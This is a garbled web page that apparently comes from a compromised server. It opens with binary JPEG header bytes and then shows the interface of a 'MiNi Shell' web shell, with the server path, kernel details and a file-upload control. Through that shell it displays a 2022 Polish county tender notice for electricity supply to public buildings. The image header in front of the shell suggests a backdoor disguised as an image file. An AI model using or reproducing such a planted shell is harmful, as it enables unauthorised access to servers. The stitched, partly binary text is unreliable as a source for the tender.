JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220208/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220208/0005055201-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> „Dostawa energii elektrycznej do budynków i lokali będących własnością lub w Zarządzie Powiatu Grodziskiego” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">POWIAT GRODZISKI</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 013269108</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Daleka 11a</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Grodzisk Mazowiecki</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">05-825</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL913 - Warszawski zachodni</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zp@powiat-grodziski.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://www.powiat-grodziski.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Dostawa energii elektrycznej do budynków i lokali będących własnością lub w Zarządzie Powiatu Grodziskiego” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-3e93397a-88d5-11ec-9bc1-c2db95d08897</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00050552</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-02-08</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00339813/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.2 Dostawa energii elektrycznej do budywnków i lokali będących własnością lub w Zarzadzie Powiatu Grodziskiego.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://powiat-grodziski.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://powiat-grodziski.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne dot. korespondencji elektronicznej znajdują się w SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">XXXIII.	Ochrona danych osobowych osób fizycznych i klauzula informacyjna z art. 13 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), zwane dalej „rozporządzeniem 2016/679”.<br/>1.	Zamawiający udostępnia dane osobowe, o których mowa w art. 10 rozporządzenia 2016/679, w celu umożliwienia korzystania ze środków ochrony prawnej, o których mowa w dziale XXXIV, do upływu terminu na ich wniesienie.<br/>2.	Skorzystanie przez osobę, której dane osobowe dotyczą, z uprawnienia do sprostowania lub uzupełnienia, o którym mowa w art. 16 rozporządzenia 2016/679, nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia ani zmianą postanowień umowy w sprawie zamówienia publicznego w zakresie niezgodnym z ustawą. <br/>3.	Zgłoszenie żądania ograniczenia przetwarzania, o którym mowa w art. 18 ust. 1 rozporządzenia 2016/679, nie ogranicza przetwarzania danych osobowych do czasu zakończenia tego postępowania.<br/>4.	W przypadku gdy wniesienie żądania dotyczącego prawa, o którym mowa w art. 18 ust. 1 rozporządzenia 2016/679, spowoduje ograniczenie przetwarzania danych osobowych zawartych w protokole postępowania lub załącznikach do tego protokołu, od dnia zakończenia postępowania o udzielenie zamówienia zamawiający nie udostępnia tych danych, chyba że zachodzą przesłanki, o których mowa w art. 18 ust. 2 rozporządzenia 2016/679. <br/>5.	Ograniczenia zasady jawności, o których mowa w ust. 3 i art. 18 ust. 3-6 Pzp, stosuje się odpowiednio. <br/>6.	W przypadku korzystania przez osobę, której dane osobowe są przetwarzane przez zamawiającego, z uprawnienia, o którym mowa w art. 15 ust. 1–3 rozporządzenia 2016/679, zamawiający może żądać od osoby występującej z żądaniem wskazania dodatkowych informacji, mających na celu sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie zamówienia. <br/>7.	Skorzystanie przez osobę, której dane osobowe są przetwarzane, z uprawnienia do sprostowania lub uzupełnienia danych osobowych, o którym mowa w art. 16 rozporządzenia 2016/679, nie może naruszać integralności protokołu postępowania oraz jego załączników.<br/>8.	W postępowaniu są przetwarzane dane osobowe podlegające ochronie zgodnie z przepisami ustawy z dnia 10 maja 2018 r. o ochronie danych osobowych (Dz.U. z 2019 r. poz. 1781) oraz rozporządzenia 2016/679. Dane te mogą dotyczyć w szczególności samego wykonawcy (osoby fizycznej prowadzącej działalność gospodarczą), jego pełnomocnika (osoby fizycznej), jak też informacji o osobach, które w swojej ofercie wykonawca przedkłada celem wykazania spełniania warunków udziału w postępowaniu, braku podstaw do wykluczenia z postępowania, jak i potwierdzenia wymogów zamawiającego dotyczących wykonania przedmiotu zamówienia.<br/>9.	W postępowaniu i po zakończeniu postępowania do przetwarzania danych osobowych osób fizycznych stosuje się przepisy ustawy z dnia 10 maja 2018 r. o ochronie danych osobowych (Dz.U. z 2019 r. poz. 1781) oraz rozporządzenia 2016/679.<br/>10.	Zgodnie z art. 13 ust. 1 i 2 rozporządzenia 2016/679, zamawiający informuje, że: cd w SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.272.1.2.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest dostawa sprzedaży energii elektrycznej, zapewnienie świadczenia usługi dystrybucji energii elektrycznej oraz zapewnienie usługi odbioru i przesyłania energii elektrycznej, która została wprowadzona przez Prosumenta do sieci OSD, a wytworzona w mikroinstalacji. Przedmiot zamówienia będzie realizowany zgodnie z przepisami ustawy z dnia 10 kwietnia 1997 r. Prawo energetyczne (Dz. U. z 2021 r. poz.716) wraz z aktami wykonawczymi oraz ustawą z dnia 20 lutego 2015 r. o odnawialnych źródłach energii (Dz.U. 2021 poz. 610). Zamawiający chce być rozliczany jako Prosument. Energia wyprodukowana przez instalację fotowoltaiczną w nadwyżce będzie przekazywana do Operatora Systemu Dystrybucji, zaś w sytuacji bieżących braków energia będzie odbierana w stosunku ilościowym 1:0,7 bez ponoszenia dodatkowych kosztów (tj. z tytułu jej rozliczenia oraz opłat za świadczoną usługę dystrybucji) w celu jej zużycia na potrzeby własne Prosumenta.<br/>Dostawcą energii dla obiektu objętego niniejszym postępowaniem do dnia 31.01.2022 r. była firma One S.A. ul. Adam Naruszewicza 27 lok. 2 02-627 Warszawa. Od dnia 01.02.2022 r. w energię elektryczną obiekt Powiatu Grodziskiego zaopatruje dostawca rezerwowy - PGE Obrót S.A.<br/>Powiat Grodziski dysponuje tytułem prawnym, który upoważnia go do swobodnego dysponowania obiektem opisanymi w przedmiocie zamówienia.<br/>Zamawiający informuje, że udzieli Wykonawcy stosownego pełnomocnictwa do zgłoszenia w imieniu Zamawiającego zawartej umowy sprzedaży energii elektrycznej do OSD oraz wykonania czynności niezbędnych do przeprowadzenia procesu zmiany sprzedawcy u OSD według wzoru stosowanego powszechnie przez Wykonawcę.<br/>Zamawiający posiada podpisaną umowę na czas nieokreślony na dystrybucję energii elektrycznej do wyżej wymienionego obiektu z firmą: PGE Dystrybucja S.A. Oddział Warszawa ul. Marsa 95, kod 04-470 Warszawa.<br/>Rozliczenie dostawy odbywać się będzie na podstawie faktycznego zużycia energii według cen i stawek sprzedawcy energii. Podana wartość zużycia energii jest orientacyjna i służy jedynie do porównania cen złożonych ofert. Rzeczywiste wartości mogą być inne.<br/>Zamawiający nie wyraża zgody na udostępnianie Zamawiającemu faktur VAT za pośrednictwem kanałów elektronicznych na podany adres poczty elektronicznej, zgodnie z ustawą z dnia 11 marca 2004 r. o podatku od towarów i usług (Dz.U. 2020 poz. 106 z późn. zm.) przy jednoczesnej zgodzie na otrzymywanie informacji o tych fakturach.<br/><br/><br/><br/>I.	Lokalizacja: Grodzisk Mazowiecki ul. Daleka 11A<br/><br/>1)	Grupa taryfowa: C21<br/>2)	Prąd trójfazowy<br/>3)	Moc umowna: 50,0 kW przy zabezpieczeniu przelicznikowym 125 A i współczynniku mocy tg(fi) nie większym niż 0,40.<br/>4)	Grupa przyłączeniowa: IV<br/>5)	Pomiar pobieranej mocy i energii elektrycznej odbywa się na napięciu 400 V.<br/>6)	Energia elektryczna dostarczana będzie do:<br/>Rodzaj przyłącza kablowe<br/>7)	Miejscem dostarczania energii elektrycznej są zaciski prądowe na wyjściu przewodów od zabezpieczenia w złączu, w kierunku instalacji Zamawiającego, co stanowi granicę eksploatacji.<br/>8)	Łączną ilość energii elektrycznej, która będzie dostarczona w okresie obowiązywania umowy szacuje się w wysokości 340.000,0 kWh.<br/>9)	Układ pomiarowo-rozliczeniowy: typ bezpośredni, <br/>10)	Budynek posiada instalację fotowoltaiczna na dachu budynku o mocy 38,50 kW którą planujemy rozbudować do mocy 50,0 kW,<br/>11)	Budynek posiada kompensacje mocy biernej<br/>12)	Nr PPE: PL_ZEWD_1405000304_06, nr licznika: 44300227 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">09000000-3 - Produkty naftowe, paliwo, energia elektryczna i inne źródła energii</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">09300000-2 - Energia elektryczna, cieplna, słoneczna i jądrowa</p> <p class="mb-0">09310000-5 - Elektryczność</p> <p class="mb-0">65300000-6 - Przesył energii elektrycznej i podobne usługi</p> <p class="mb-0">65310000-9 - Przesył energii elektrycznej</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">48 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">do 10%</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">XX.	Opis kryteriów oceny ofert wraz z podaniem wag tych kryteriów i sposobu oceny ofert. <br/>1.	Kryterium „Cena” w zł:<br/>1) znaczenie kryterium - 60% (0,6);<br/>2) opis sposobu oceny ofert dla kryterium „Ceny”: <br/>Lcena = (Cmin / C) x 0,6 x 100 pkt<br/>gdzie:<br/>a)	Lcena - liczba uzyskanych punktów dla kryterium „Cena” ocenianej oferty;<br/>b)	Cmin - cena w ofercie z najniższą ceną;<br/>c)	C - cena w ofercie ocenianej.<br/>2.	Kryterium „Termin płatności” w dniach:<br/>1)	znaczenie kryterium - 40% (0,4);<br/>2)	opis sposobu oceny ofert dla kryterium „Termin płatności”: <br/>T- Termin płatności. (Minimalnie 14 dni, maksymalnie 30 dni). Do wyliczenia terminu Zamawiający przyjmie „Termin płatności” wskazany przez Wykonawcę w Formularzu ofertowym (Załącznik nr 1 do SWZ).<br/>Przyznane pkt T=	Termin płatności z badanej oferty x 40 pkt<br/>	najdłuższy termin płatności wskazany w złożonych ofertach<br/><br/><br/> Liczba punktów określona zostanie na podstawie poniższego wzoru:<br/><br/> C+T<br/><br/>W przypadku wskazania terminu płatności dłuższego niż 30 dni oferta Wykonawcy zostanie odrzucona. W przypadku wartości z przecinkami ( np. 20,5 dnia) wartość zostanie zaokrąglana w dół do pełnego dnia. W przypadku podania terminu w innych jednostkach (np. godziny) oferta Wykonawcy zostanie odrzucona. W przypadku wskazania terminu płatności niższego niż 14 dni oferta Wykonawcy zostanie odrzucona.<br/><br/><br/>3.	Za najkorzystniejszą zostanie uznana oferta, która uzyska największą liczbę punktów ze wszystkich kryteriów. Uzyskana liczba punktów w ramach kryterium zaokrąglona będzie do drugiego miejsca po przecinku. Jeżeli trzecia cyfra po przecinku (i/lub następne) jest mniejsza od 5 wynik zostanie zaokrąglony w dół, a jeżeli cyfra jest równa lub większa od 5 wynik zostanie zaokrąglony w górę.<br/>4.	Jeżeli nie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, zamawiający wybiera spośród tych ofert ofertę, która otrzymała najwyższą ocenę w kryterium o najwyższej wadze. <br/>5.	Jeżeli oferty otrzymały taką samą ocenę w kryterium o najwyższej wadze, zamawiający wybiera ofertę z najniższą ceną lub najniższym kosztem.<br/>6.	Jeżeli nie można dokonać wyboru oferty w sposób, o którym mowa w ust. 5, zamawiający wzywa wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez zamawiającego ofert dodatkowych zawierających nową cenę lub koszt.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin płatności</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest dostawa energii elektrycznej do budynków i lokali będących własnością lub w Zarządzie Powiatu Grodziskiego na okres 12 miesięcy. Przedmiot zamówienia będzie realizowany zgodnie z przepisami ustawy z dnia 10 kwietnia 1997 r. Prawo energetyczne (Dz. U. z 2021 r. poz.716) wraz z aktami wykonawczymi.<br/><br/><br/><br/><br/>I.	Lokalizacja: Grodzisk Mazowiecki ul. Kościuszki 30<br/><br/>1)	Grupa taryfowa: C11<br/>2)	Prąd trójfazowy<br/>3)	Moc umowna: 11,0 kW przy zabezpieczeniu przedlicznikowym 40 A <br/>i wpółczynniku mocy tg(fi) nie większym niż 0,40.<br/>4)	Grupa przyłączeniowa: V<br/>5)	Pomiar pobieranej mocy i energii elektrycznej odbywa się na napięciu 400 V.<br/>6)	Energia elektryczna dostarczana będzie do:<br/>Przyłącze nr 1<br/>(nazwa przyłącza)	Linia kablowa Yaky<br/>(napięcie) 0,4 [kV]<br/>7)	Miejscem dostarczania energii elektrycznej są zaciski prądowe na wyjściu przewodów od zabezpieczenia w złączu, w kierunku instalacji Zamawiającego.<br/>8)	Łączną ilość energii elektrycznej, która będzie dostarczona w okresie obowiązywania umowy szacuje się w wysokości 15.900,0 kWh<br/>9)	Układ pomiarowo-rozliczeniowy: typ półpośredni<br/>10) Nr PPE: PL_ZEWD_1405000318_03, nr licznika: 00356159<br/><br/><br/>II.	Lokalizacja: Grodzisk Mazowiecki ul. Kościuszki 32<br/><br/>1)	Grupa taryfowa: C11<br/>2)	Prąd trójfazowy<br/>3)	Moc umowna: 17,0 kW przy zabezpieczeniu przedlicznikowym 50 A <br/>i współczynniku mocy tg(fi) nie większym niż 0,40.<br/>4)	Grupa przyłączeniowa: V<br/>5)	Pomiar pobieranej mocy i energii elektrycznej odbywa się na napięciu 400 V.<br/>6)	Energia elektryczna dostarczana będzie do:<br/>Rodzaj przyłącza kablowe<br/>7)	Miejscem dostarczania energii elektrycznej są zaciski prądowe na wyjściu przewodów od zabezpieczenia w złączu, w kierunku instalacji Zamawiającego, co stanowi granicę eksploatacji.<br/>8)	Łączną ilość energii elektrycznej, która będzie dostarczona w okresie obowiązywania umowy szacuje się w wysokości 41.2000,0 kWh.<br/>9)	Układ pomiarowo-rozliczeniowy: typ bezpośredni<br/>10)	Nr PPE: PL_ZEWD_1405000317_01; numer licznika: 44299839<br/><br/><br/><br/>III.	Lokalizacja: Grodzisk Mazowiecki ul. Żyrardowska 48<br/><br/>1)	Grupa taryfowa: C21<br/>2)	Prąd trójfazowy<br/>3)	Moc umowna: 40,0 kW przy zabezpieczeniu przelicznikowym 125 A i współczynniku mocy tg(fi) nie większym niż 0,40.<br/>4)	Grupa przyłączeniowa: IV<br/>5)	Pomiar pobieranej mocy i energii elektrycznej odbywa się na napięciu 400 V.<br/>6)	Energia elektryczna dostarczana będzie do:<br/>Rodzaj przyłącza kablowe<br/>7)	Miejscem dostarczania energii elektrycznej są zaciski prądowe na wyjściu przewodów od zabezpieczenia w złączu, w kierunku instalacji Zamawiającego, co stanowi granicę eksploatacji.<br/>8)	Łączną ilość energii elektrycznej, która będzie dostarczona w okresie obowiązywania umowy szacuje się w wysokości 90.200,0 kWh.<br/>9)	Układ pomiarowo-rozliczeniowy: typ bezpośredni<br/>10)	Budynek posiada kompensacje mocy biernej<br/>11)	Nr PPE: PL_ZEWD_1405000305_08, nr licznika: 04144081<br/><br/>IV.	Lokalizacja: Milanówek ul. Piasta 30<br/><br/>1)	Grupa taryfowa: C11<br/>2)	Prąd trójfazowy<br/>3)	Moc umowna: 20,0 kW przy zabezpieczeniu przelicznikowym 100 A i współczynniku mocy tg(fi) nie większym niż 0,40.<br/>4)	Grupa przyłączeniowa: IV<br/>5)	Pomiar pobieranej mocy i energii elektrycznej odbywa się na napięciu 400 V.<br/>6)	Energia elektryczna dostarczana będzie do:<br/> Rodzaj przyłącza kablowe<br/>7)	Miejscem dostarczania energii elektrycznej są zaciski prądowe na wyjściu przewodów od zabezpieczenia w złączu, w kierunku instalacji Zamawiającego, co stanowi granicę eksploatacji.<br/>8)	Łączną ilość energii elektrycznej, która będzie dostarczona w okresie obowiązywania umowy szacuje się w wysokości 40.600,0 kWh.<br/>9)	Układ pomiarowo-rozliczeniowy: typ bezpośredni<br/>10)	Nr PPE: PL_ZEWD_1405000302_02, nr licznika: 42100515<br/><br/><br/><br/>V.	Lokalizacja: Grodzisk Mazowiecki ul. Daleka 11 C m 17 (lokal mieszkalny)<br/><br/>1)	Grupa taryfowa: G11<br/>2)	Prąd trójfazowy<br/>3)	Moc umowna: 4,0 kW przy zabezpieczeniu przelicznikowym 20 A i współczynniku mocy tg(fi) nie większym niż 0,40.<br/>4)	Grupa przyłączeniowa: IV<br/>5)	Pomiar pobieranej mocy i energii elektrycznej odbywa się na napięciu 220 V.<br/>6)	Energia elektryczna dostarczana będzie do:<br/> Rodzaj przyłącza kablowe<br/>7)	Miejscem dostarczania energii elektrycznej są zaciski prądowe na wyjściu przewodów od zabezpieczenia w złączu, w kierunku instalacji Zamawiającego, co stanowi granicę eksploatacji.<br/>8)	Łączną ilość energii elektrycznej, która będzie dostarczona w okresie obowiązywania umowy szacuje się w wysokości 1.455,0 kWh.<br/>9)	Układ pomiarowo-rozliczeniowy: typ bezpośredni 